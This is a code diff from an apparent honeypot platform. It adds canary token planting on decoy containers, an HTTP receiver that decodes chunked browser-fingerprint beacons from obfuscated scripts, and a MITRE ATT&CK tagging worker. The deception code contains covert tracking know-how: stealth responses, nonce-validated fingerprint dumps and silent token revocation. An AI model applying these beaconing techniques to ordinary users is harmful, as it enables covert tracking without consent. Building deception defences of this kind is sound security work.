@@ -196,6 +150,7 @@ async def revoke(
repo: Optional[BaseRepository] = None, repo: Optional[BaseRepository] = None,
publish: bool = True, publish: bool = True,
bus: Optional[BaseBus] = None, bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]: ) -> tuple[bool, Optional[str]]:
"""Best-effort unlink + state transition + bus publish. """Best-effort unlink + state transition + bus publish.
@@ -203,11 +158,10 @@ async def revoke(
the file is gone after the call (whether we deleted it or it was the file is gone after the call (whether we deleted it or it was
already missing); only docker / container-down errors return False. already missing); only docker / container-down errors return False.
""" """
sh_cmd = f"rm -f {shlex.quote(placement_path)}" target_container = container or _container_for(decky_name)
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd] success, error = await delete_file_from_container(
rc, _stdout, stderr = await _run(argv) target_container, placement_path,
success = rc == 0 )
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
if repo is not None: if repo is not None:
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None) await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
@@ -250,6 +204,7 @@ async def seed_baseline(
persona: str = "linux", persona: str = "linux",
created_by: str = "system", created_by: str = "system",
bus: Optional[BaseBus] = None, bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> list[dict[str, Any]]: ) -> list[dict[str, Any]]:
"""Plant the configured baseline canary set on one decky. """Plant the configured baseline canary set on one decky.
@@ -293,9 +248,59 @@ async def seed_baseline(
await plant( await plant(
decky_name, artifact, decky_name, artifact,
token_uuid=token_uuid, repo=repo, publish=True, bus=bus, token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
container=container,
) )
out.append({ out.append({
"token_uuid": token_uuid, "generator": gen_name, "kind": kind, "token_uuid": token_uuid, "generator": gen_name, "kind": kind,
"callback_token": slug, "placement_path": artifact.path, "callback_token": slug, "placement_path": artifact.path,
}) })
return out return out
async def seed_baseline_topology(
repo: BaseRepository,
topology_id: str,
*,
created_by: str = "system",
bus: Optional[BaseBus] = None,
) -> list[dict[str, Any]]:
"""Plant baseline canaries on every decky in a MazeNET topology.
Mirrors :func:`seed_baseline` for the topology path. Container name
resolution uses :func:`resolve_topology_container` since topology
deckies may not have an ssh service — in that case we target the
base container instead.
Best-effort: failures on any single decky are logged inside
:func:`plant`; the deploy hook treats the return value as
informational. Returns a flat list of per-token dicts (with an added
``decky_name`` key) across all deckies.
"""
from decnet.topology.persistence import hydrate
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
log.warning(
"canary.seed_baseline_topology: topology %s not found", topology_id,
)
return []
out: list[dict[str, Any]] = []
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
decky_name = cfg.get("name") or decky.get("name")
if not decky_name:
continue
services = decky.get("services") or []
container = resolve_topology_container(topology_id, decky_name, services)
# MazeNET deckies don't carry an OS persona today; default to
# linux (every base image we ship is Linux).
rows = await seed_baseline(
decky_name, repo,
persona="linux", created_by=created_by, bus=bus,
container=container,
)
for r in rows:
r["decky_name"] = decky_name
out.append(r)
return out

View File

@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
from __future__ import annotations from __future__ import annotations
import asyncio import asyncio
import base64
import binascii
import json
import os import os
import time
import uuid
from datetime import datetime, timezone from datetime import datetime, timezone
from typing import Optional from typing import Any, Optional
from fastapi import FastAPI, Request, Response from fastapi import FastAPI, Request, Response
@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
) )
# Namespace used by fingerprint generators to derive mint UUID.
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
# Not shared across worker restarts or processes — acceptable for MVP.
_FP_RATE_WINDOW_S = 60
_FP_RATE_LIMIT = 30
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
key = (token_uuid, src_ip)
now = time.monotonic()
cutoff = now - _FP_RATE_WINDOW_S
bucket = _fp_rate_buckets.get(key, [])
bucket = [t for t in bucket if t > cutoff]
if len(bucket) >= _FP_RATE_LIMIT:
_fp_rate_buckets[key] = bucket
return False
bucket.append(now)
_fp_rate_buckets[key] = bucket
return True
def _is_valid_fp_shape(fp: dict) -> bool:
"""Layer B — structural sanity check on a decoded fingerprint blob."""
if not isinstance(fp.get("mint"), str) or not fp["mint"]:
return False
known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
return present >= 3
def _http_base() -> str: def _http_base() -> str:
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/") return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
@app.get("/c/{slug}") @app.get("/c/{slug}")
async def callback(slug: str, request: Request) -> Response: async def callback(slug: str, request: Request) -> Response:
raw_nonce = request.query_params.get("k")
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
merged_headers = dict(request.headers)
if fp_meta:
merged_headers.update(fp_meta)
await _record_hit( await _record_hit(
repo, bus, repo, bus,
slug=slug, slug=slug,
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
user_agent=request.headers.get("user-agent"), user_agent=request.headers.get("user-agent"),
request_path=str(request.url.path), request_path=str(request.url.path),
dns_qname=None, dns_qname=None,
raw_headers=dict(request.headers), raw_headers=merged_headers,
parsed_fp=parsed_fp,
raw_nonce=raw_nonce,
) )
# Always 200 with a tiny image so the attacker's client sees # Always 200 with a tiny image so the attacker's client sees
# a "success" — same return regardless of whether the slug is # a "success" — same return regardless of whether the slug is
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
return app return app
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
# overflow is handled via chunking (s/i/n + d). Anything larger than
# this on a single request is junk, so we drop it instead of letting an
# attacker inflate a trigger row indefinitely.
_FP_CHUNK_MAX = 8 * 1024
def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
"""Decode fingerprint-payload query params into (meta_dict, parsed_fp).
The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
* ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
* ``?d=<b64url-json>`` — single-shot fingerprint dump.
* ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
Returns a tuple of:
- ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
- ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
when there's no ``?d=`` or decoding fails.
"""
out: dict[str, Any] = {}
parsed_fp: Optional[dict] = None
if not qp:
return out, parsed_fp
o = qp.get("o") if hasattr(qp, "get") else None
if o:
out["_fp_open"] = "1"
d = qp.get("d") if hasattr(qp, "get") else None
if not d:
return out, parsed_fp
if len(d) > _FP_CHUNK_MAX:
out["_fp_oversize"] = "1"
return out, parsed_fp
sid = qp.get("s")
idx = qp.get("i")
total = qp.get("n")
if sid and idx and total:
out["_fp_sid"] = sid
out["_fp_idx"] = idx
out["_fp_total"] = total
out["_fp_chunk"] = d
return out, parsed_fp
# Single-shot: decode and pass back as parsed_fp; validation runs in
# _record_hit after token lookup so we have the stored nonce at hand.
try:
padded = d + "=" * (-len(d) % 4)
raw = base64.urlsafe_b64decode(padded.encode("ascii"))
parsed = json.loads(raw.decode("utf-8"))
except (binascii.Error, ValueError, UnicodeDecodeError):
out["_fp_decode_error"] = "1"
return out, parsed_fp
if isinstance(parsed, dict):
parsed_fp = parsed
else:
out["_fp_decode_error"] = "1"
return out, parsed_fp
def _client_ip(request: Request) -> str: def _client_ip(request: Request) -> str:
# Honor X-Forwarded-For if the operator deployed behind a reverse # Honor X-Forwarded-For if the operator deployed behind a reverse
# proxy. Take the leftmost address in the chain; everything after # proxy. Take the leftmost address in the chain; everything after
@@ -154,16 +262,58 @@ async def _record_hit(
request_path: Optional[str], request_path: Optional[str],
dns_qname: Optional[str], dns_qname: Optional[str],
raw_headers: Optional[dict], raw_headers: Optional[dict],
parsed_fp: Optional[dict] = None,
raw_nonce: Optional[str] = None,
) -> None: ) -> None:
"""Resolve slug -> token, persist a trigger, publish on the bus. """Resolve slug -> token, persist a trigger, publish on the bus.
Unknown slugs are silently swallowed: returning the same response Unknown slugs are silently swallowed: returning the same response
for known and unknown slugs is the stealth posture, and persisting for known and unknown slugs is the stealth posture, and persisting
every random scan would clutter the DB. every random scan would clutter the DB.
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
it is validated through four layers before being merged into raw_headers:
A) nonce match against CanaryToken.fingerprint_nonce,
B) structural shape check,
C) mint UUID consistency,
D) per-(token, IP) rate limit.
Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
The trigger row always lands regardless — the GET hit is itself forensic.
""" """
token = await repo.get_canary_token_by_slug(slug) token = await repo.get_canary_token_by_slug(slug)
if token is None: if token is None:
return return
final_headers: dict[str, Any] = dict(raw_headers or {})
if parsed_fp is not None:
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
# Layer A — nonce
if stored_nonce is not None and raw_nonce != stored_nonce:
final_headers["_fp_invalid_nonce"] = "1"
parsed_fp = None
# Layer B — shape (only when nonce passed or no nonce enforced)
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
final_headers["_fp_invalid_shape"] = "1"
parsed_fp = None
# Layer C — mint UUID consistency
if parsed_fp is not None:
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
if parsed_fp.get("mint") != expected_mint:
final_headers["_fp_invalid_mint"] = "1"
parsed_fp = None
# Layer D — rate limit
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
final_headers["_fp_rate_limited"] = "1"
parsed_fp = None
if parsed_fp is not None:
final_headers["_fp"] = parsed_fp
trigger_id = await repo.record_canary_trigger({ trigger_id = await repo.record_canary_trigger({
"token_uuid": token["uuid"], "token_uuid": token["uuid"],
"occurred_at": datetime.now(timezone.utc), "occurred_at": datetime.now(timezone.utc),
@@ -171,7 +321,7 @@ async def _record_hit(
"user_agent": user_agent, "user_agent": user_agent,
"request_path": request_path, "request_path": request_path,
"dns_qname": dns_qname, "dns_qname": dns_qname,
"raw_headers": raw_headers or {}, "raw_headers": final_headers,
}) })
try: try:
await bus.publish( await bus.publish(
@@ -189,6 +339,22 @@ async def _record_hit(
except Exception as e: # noqa: BLE001 — best effort except Exception as e: # noqa: BLE001 — best effort
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e) log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
# Auto-deregister fingerprint canaries after the first valid fingerprint
# is collected. Slug goes dark; the stealth posture means the attacker
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
# http/dns canaries are NOT auto-revoked.
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
try:
await repo.update_canary_token_state(token["uuid"], "revoked")
await bus.publish(
topics.canary(token["uuid"], topics.CANARY_REVOKED),
{"token_id": token["uuid"], "trigger_id": trigger_id,
"reason": "fingerprint_collected"},
)
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
# ---------------------------- DNS surface -------------------------------- # ---------------------------- DNS surface --------------------------------
@@ -214,7 +380,7 @@ async def _start_dns_server(
local_addr=(_dns_bind(), _dns_port()), local_addr=(_dns_bind(), _dns_port()),
) )
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port()) log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
return transport # type: ignore[return-value] return transport
# ---------------------------- entry point -------------------------------- # ---------------------------- entry point --------------------------------

View File

@@ -39,6 +39,7 @@ from . import (
swarm, swarm,
swarmctl, swarmctl,
topology, topology,
ttp,
updater, updater,
web, web,
webhook, webhook,
@@ -59,7 +60,7 @@ for _mod in (
swarm, swarm,
deploy, lifecycle, workers, inventory, deploy, lifecycle, workers, inventory,
web, profiler, orchestrator, realism, reconciler, sniffer, db, web, profiler, orchestrator, realism, reconciler, sniffer, db,
topology, bus, geoip, init, webhook, canary, topology, bus, geoip, init, webhook, canary, ttp,
): ):
_mod.register(app) _mod.register(app)

View File

@@ -1,8 +1,13 @@
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens. """``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a Two entry points share this module:
``@app.command(name="canary")`` Typer entry point that delegates to
:func:`decnet.canary.worker.run`. * ``decnet canary`` — runs the worker process. Mirrors the shape of
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
systemd unit so its argv must stay stable.
* ``decnet canary-install-toolchain`` — provisions the Node side of
the fingerprint-canary obfuscator. Idempotent; safe to call from
the API service unit's ``ExecStartPre``.
Not master-only — any host that hosts deckies can run its own Not master-only — any host that hosts deckies can run its own
canary worker (the bus events stay local; the webhook worker on canary worker (the bus events stay local; the webhook worker on
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
""" """
from __future__ import annotations from __future__ import annotations
import shutil
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
from pathlib import Path
import typer import typer
from . import utils as _utils from . import utils as _utils
from .utils import console, log from .utils import console, log
_TOOLCHAIN_TIMEOUT_S = 180
def register(app: typer.Typer) -> None: def register(app: typer.Typer) -> None:
@app.command(name="canary") @app.command(name="canary")
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
asyncio.run(run()) asyncio.run(run())
except KeyboardInterrupt: except KeyboardInterrupt:
console.print("\n[yellow]Canary worker stopped.[/]") console.print("\n[yellow]Canary worker stopped.[/]")
@app.command(name="canary-install-toolchain")
def canary_install_toolchain(
npm_bin: str = typer.Option(
"npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
),
) -> None:
"""Install the Node-side toolchain used by fingerprint canaries.
Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
directory so the obfuscator's helper script can ``require()``
``javascript-obfuscator`` at mint time. Requires Node >= 18.
Idempotent: re-running on an already-installed tree is fast
(npm short-circuits when ``node_modules/`` is up-to-date).
"""
import decnet.canary as _canary_pkg
canary_dir = Path(_canary_pkg.__file__).resolve().parent
if not (canary_dir / "package.json").is_file():
console.print(
f"[red]canary package.json not found under {canary_dir}; "
"wheel may be missing the JS toolchain payload.[/]"
)
raise typer.Exit(code=2)
if shutil.which(npm_bin) is None:
console.print(
f"[red]npm executable {npm_bin!r} not found on PATH. "
"Install Node >= 18 and re-run.[/]"
)
raise typer.Exit(code=2)
console.print(
f"[cyan]installing canary toolchain[/] in {canary_dir}",
)
try:
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
[npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
cwd=str(canary_dir),
capture_output=True, text=True,
timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
)
except subprocess.TimeoutExpired:
console.print("[red]npm install timed out after 3 minutes[/]")
raise typer.Exit(code=3) from None
if proc.returncode != 0:
console.print(
f"[red]npm install failed rc={proc.returncode}[/]\n"
f"{proc.stderr.strip()}"
)
raise typer.Exit(code=proc.returncode)
console.print("[green]canary toolchain ready[/]")

View File

@@ -30,6 +30,10 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
"mutate", "listener", "profiler", "mutate", "listener", "profiler",
"services", "distros", "correlate", "archetypes", "web", "services", "distros", "correlate", "archetypes", "web",
"db-reset", "init", "webhook", "clusterer", "campaign-clusterer", "db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
# `ttp` runs on agents — local SMTP decoys persist .eml files into the
# agent's artifacts tree and the EmailLifter disk-reaches them in-process
# (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
"ttp-backfill",
}) })
MASTER_ONLY_GROUPS: frozenset[str] = frozenset( MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
{"swarm", "topology", "geoip", "realism"} {"swarm", "topology", "geoip", "realism"}
@@ -65,7 +69,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
return return
_app.registered_commands = [ _app.registered_commands = [
c for c in _app.registered_commands c for c in _app.registered_commands
if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
] ]
_app.registered_groups = [ _app.registered_groups = [
g for g in _app.registered_groups g for g in _app.registered_groups

View File

@@ -44,6 +44,12 @@ _CONFIG_PLACEHOLDER = """\
# EnvironmentFile= — never in a group-readable INI. # EnvironmentFile= — never in a group-readable INI.
[decnet] [decnet]
# DECNET-service user/group as configured at `decnet init` time.
# Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
# so the same user name can have different numeric uids on master vs
# agents without breaking artifact ownership.
api-user = {api_user}
api-group = {api_group}
# mode = master # or "agent" # mode = master # or "agent"
# [api] # [api]
@@ -74,6 +80,7 @@ _CONFIG_PLACEHOLDER = """\
# master-host = 10.0.0.1 # master-host = 10.0.0.1
# syslog-port = 6514 # syslog-port = 6514
# swarmctl-port = 8770 # swarmctl-port = 8770
# swarmctl-host = 127.0.0.1
# [logging] # [logging]
# system-log = /var/log/decnet/decnet.system.log # system-log = /var/log/decnet/decnet.system.log
@@ -197,14 +204,17 @@ def _ensure_dir(
return f"skip: {path} already present" if existed else "ok" return f"skip: {path} already present" if existed else "ok"
def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str: def _ensure_config(
path: Path, group: str, *, user: str, dry_run: bool,
) -> str:
if path.exists(): if path.exists():
return f"skip: {path} already present" return f"skip: {path} already present"
if dry_run: if dry_run:
console.print(f" [dim]would write:[/] {path}") console.print(f" [dim]would write:[/] {path}")
return "ok" return "ok"
path.parent.mkdir(parents=True, exist_ok=True) path.parent.mkdir(parents=True, exist_ok=True)
path.write_text(_CONFIG_PLACEHOLDER) rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
path.write_text(rendered)
try: try:
os.chmod(path, 0o640) os.chmod(path, 0o640)
gid = grp.getgrnam(group).gr_gid gid = grp.getgrnam(group).gr_gid
@@ -601,7 +611,7 @@ def register(app: typer.Typer) -> None:
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx). # (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
_install_rel = install_dir.lstrip("/") _install_rel = install_dir.lstrip("/")
required_tools = ("systemctl",) if deinit else ( required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
"systemctl", "useradd", "groupadd", "systemd-tmpfiles", "systemctl", "useradd", "groupadd", "systemd-tmpfiles",
) )
if deinit: if deinit:
@@ -658,7 +668,7 @@ def register(app: typer.Typer) -> None:
) )
_step( _step(
"systemctl daemon-reload", "systemctl daemon-reload",
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
) )
_step( _step(
f"remove {etc_decnet / 'decnet.ini'}", f"remove {etc_decnet / 'decnet.ini'}",
@@ -754,6 +764,13 @@ def register(app: typer.Typer) -> None:
(pfx / _install_rel, 0o755, user, group), (pfx / _install_rel, 0o755, user, group),
(pfx / "var/lib/decnet", 0o750, user, group), (pfx / "var/lib/decnet", 0o750, user, group),
(pfx / "var/lib/decnet/geoip", 0o755, user, group), (pfx / "var/lib/decnet/geoip", 0o755, user, group),
# DEBT-035 / DEBT-047: artifact root carries setgid (the
# 0o2... bit) so every file written under it inherits the
# decnet group regardless of which container's uid created
# it. Group-write (0o2775) lets the API process and the
# local TTP worker read each other's outputs without a
# manual chown after every fresh deploy.
(pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
(pfx / "var/log/decnet", 0o750, user, group), (pfx / "var/log/decnet", 0o750, user, group),
(etc_decnet, 0o755, "root", group), (etc_decnet, 0o755, "root", group),
(pfx / "run/decnet", 0o755, "root", group), (pfx / "run/decnet", 0o755, "root", group),
@@ -775,12 +792,15 @@ def register(app: typer.Typer) -> None:
for path, mode, d_owner, d_group in dirs: for path, mode, d_owner, d_group in dirs:
_step( _step(
f"ensure dir {path}", f"ensure dir {path}",
lambda p=path, m=mode, o=d_owner, g=d_group: lambda p=path, m=mode, o=d_owner, g=d_group: # type: ignore[misc]
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run), _ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
) )
_step( _step(
f"write {etc_decnet / 'decnet.ini'}", f"write {etc_decnet / 'decnet.ini'}",
lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run), lambda: _ensure_config(
etc_decnet / "decnet.ini", group,
user=user, dry_run=dry_run,
),
) )
_step( _step(
"install systemd units", "install systemd units",
@@ -812,7 +832,7 @@ def register(app: typer.Typer) -> None:
) )
_step( _step(
"systemctl daemon-reload", "systemctl daemon-reload",
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
) )
if no_start: if no_start:
@@ -823,7 +843,7 @@ def register(app: typer.Typer) -> None:
_step( _step(
"systemctl enable --now decnet.target", "systemctl enable --now decnet.target",
lambda: ( lambda: (
_run( _run( # type: ignore[func-returns-value]
["systemctl", "enable", "--now", "decnet.target"], ["systemctl", "enable", "--now", "decnet.target"],
dry_run=dry_run, dry_run=dry_run,
), ),

View File

@@ -16,8 +16,16 @@ from .utils import console, log
def register(app: typer.Typer) -> None: def register(app: typer.Typer) -> None:
@app.command() @app.command()
def swarmctl( def swarmctl(
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"), port: int = typer.Option(
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"), 8770, "--port",
envvar="DECNET_SWARMCTL_PORT",
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
),
host: str = typer.Option(
"127.0.0.1", "--host",
envvar="DECNET_SWARMCTL_HOST",
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
),
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"), daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"), no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"), tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),

View File

@@ -233,8 +233,8 @@ def _delete(
topo = await repo.get_topology(topology_id) topo = await repo.get_topology(topology_id)
if topo is None: if topo is None:
return False, "not-found" return False, "not-found"
if topo["status"] in _RUNNING: if topo.status in _RUNNING:
return False, str(topo["status"]) return False, str(topo.status)
ok = await repo.delete_topology_cascade(topology_id) ok = await repo.delete_topology_cascade(topology_id)
return ok, None return ok, None

309
decnet/cli/ttp.py Normal file
View File

@@ -0,0 +1,309 @@
"""``decnet ttp`` — TTP-tagging worker and admin commands.
Two flat commands share this module:
* ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
``attacker.session.ended`` / ``attacker.observed`` /
``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
dispatches each event through :class:`CompositeTagger` (RuleEngine +
Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
lifters), persists ``ttp_tag`` rows via the idempotent
``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
``ttp.rule.fired.<technique_id>`` only when the insert returned a
non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
§"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
so its argv must stay stable.
* ``decnet ttp-backfill`` — replays historical events (shell commands
recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
through the live tagger. Writes ``ttp_tag`` rows using the same
idempotent insert path. **Does not publish** to the bus — replay must
not re-trigger SIEM/webhook fan-out on already-attributed events.
Both are master-only — gated via ``MASTER_ONLY_COMMANDS`` in
:mod:`decnet.cli.gating`.
"""
from __future__ import annotations
import asyncio
import time
from datetime import datetime, timedelta, timezone
from typing import Any
import typer
from decnet.ttp.factory import CompositeTagger, get_tagger
from . import utils as _utils
from .utils import console, log
_BACKFILL_SOURCES = ("command", "canary", "all")
def register(app: typer.Typer) -> None:
@app.command(name="ttp")
def ttp(
poll_interval_secs: float = typer.Option(
60.0, "--poll-interval", "-i",
help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
),
daemon: bool = typer.Option(
False, "--daemon", "-d",
help="Detach to background as a daemon process",
),
) -> None:
"""TTP-tagging worker — MITRE ATT&CK technique tagging."""
from decnet.ttp.worker import run_ttp_worker_loop
from decnet.web.dependencies import repo
if daemon:
log.info("ttp daemonizing poll=%s", poll_interval_secs)
_utils._daemonize()
log.info("ttp command invoked poll=%s", poll_interval_secs)
console.print(
f"[bold cyan]TTP tagging worker starting[/] "
f"poll={poll_interval_secs}s"
)
console.print("[dim]Press Ctrl+C to stop[/]")
async def _run() -> None:
await repo.initialize()
await run_ttp_worker_loop(
repo, poll_interval_secs=poll_interval_secs,
)
try:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]TTP tagging worker stopped.[/]")
@app.command(name="ttp-backfill")
def ttp_backfill(
since_days: int = typer.Option(
7, "--since-days", "-s",
min=1, max=3650,
help="Replay events whose source row is newer than N days ago.",
),
source: str = typer.Option(
"all", "--source",
help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
),
dry_run: bool = typer.Option(
False, "--dry-run",
help="Run the tagger but skip insert_tags. Reports counts only.",
),
batch_size: int = typer.Option(
500, "--batch-size",
min=1, max=100_000,
help="Number of tags accumulated before each repo.insert_tags call.",
),
) -> None:
"""Replay historical attacker activity through the live tagger.
Walks ``Attacker.commands`` (per-IP shell-command history) and
``CanaryTrigger`` (canary callback log) since N days ago,
builds the same :class:`TaggerEvent` shape the live worker
emits, and persists tags via the idempotent INSERT OR IGNORE
write. Re-running is safe — a second pass over identical
source rows reports ``inserted=0``.
Bus publish is intentionally suppressed; SIEM / webhook fan-out
sees only live events, never replays.
"""
from decnet.cli.gating import _require_master_mode
from decnet.web.dependencies import repo
_require_master_mode("ttp-backfill")
if source not in _BACKFILL_SOURCES:
console.print(
f"[red]invalid --source {source!r}; expected one of "
f"{_BACKFILL_SOURCES}[/]"
)
raise typer.Exit(code=2)
cutoff = datetime.now(tz=timezone.utc) - timedelta(days=since_days)
console.print(
f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
f"source={source} dry_run={dry_run} batch_size={batch_size}"
)
async def _run() -> None:
await repo.initialize()
await _backfill(
repo,
cutoff=cutoff,
sources=_resolve_sources(source),
dry_run=dry_run,
batch_size=batch_size,
)
try:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]Backfill interrupted.[/]")
def _resolve_sources(name: str) -> tuple[str, ...]:
if name == "all":
return ("command", "canary")
return (name,)
async def _backfill(
repo: Any,
*,
cutoff: datetime,
sources: tuple[str, ...],
dry_run: bool,
batch_size: int,
) -> None:
"""Drive the per-source backfill loops and report structured counts.
One :class:`CompositeTagger` is built once and reused for every
source — the per-lifter watch fan-out the live worker performs is
inlined here as a `watch_store()` startup task per
:class:`WatchableTagger`, so the dispatch indexes hydrate before
we start feeding events.
"""
# Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
# to inject a recording fake without touching the global factory.
tagger = get_tagger()
watch_tasks: list[asyncio.Task[None]] = []
if isinstance(tagger, CompositeTagger):
for watchable in tagger.iter_watchables():
watch_tasks.append(asyncio.create_task(watchable.watch_store()))
# Yield once so each watch_store gets a chance to run its
# initial `load_compiled` before we feed the first event.
await asyncio.sleep(0.05)
try:
if "command" in sources:
await _backfill_commands(
repo, tagger, cutoff=cutoff,
dry_run=dry_run, batch_size=batch_size,
)
if "canary" in sources:
await _backfill_canaries(
repo, tagger, cutoff=cutoff,
dry_run=dry_run, batch_size=batch_size,
)
finally:
for task in watch_tasks:
task.cancel()
for task in watch_tasks:
try:
await task
except (asyncio.CancelledError, Exception): # noqa: BLE001
pass
async def _backfill_commands(
repo: Any,
tagger: Any,
*,
cutoff: datetime,
dry_run: bool,
batch_size: int,
) -> None:
from decnet.ttp.base import TaggerEvent
started = time.monotonic()
rows_seen = 0
cmds_seen = 0
inserted = 0
pending: list[Any] = []
async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
rows_seen += 1
for idx, cmd in enumerate(commands):
cmds_seen += 1
text = cmd.get("command_text") or cmd.get("text")
if not isinstance(text, str):
continue
cmd_id = (
cmd.get("id")
or cmd.get("uuid")
or cmd.get("command_id")
or f"{attacker.uuid}#cmd{idx}"
)
event = TaggerEvent(
source_kind="command",
source_id=str(cmd_id),
attacker_uuid=attacker.uuid,
identity_uuid=getattr(attacker, "identity_id", None),
session_id=cmd.get("session_id"),
decky_id=cmd.get("decky_id") or cmd.get("decky"),
payload={**cmd, "command_text": text},
)
tags = await tagger.tag(event)
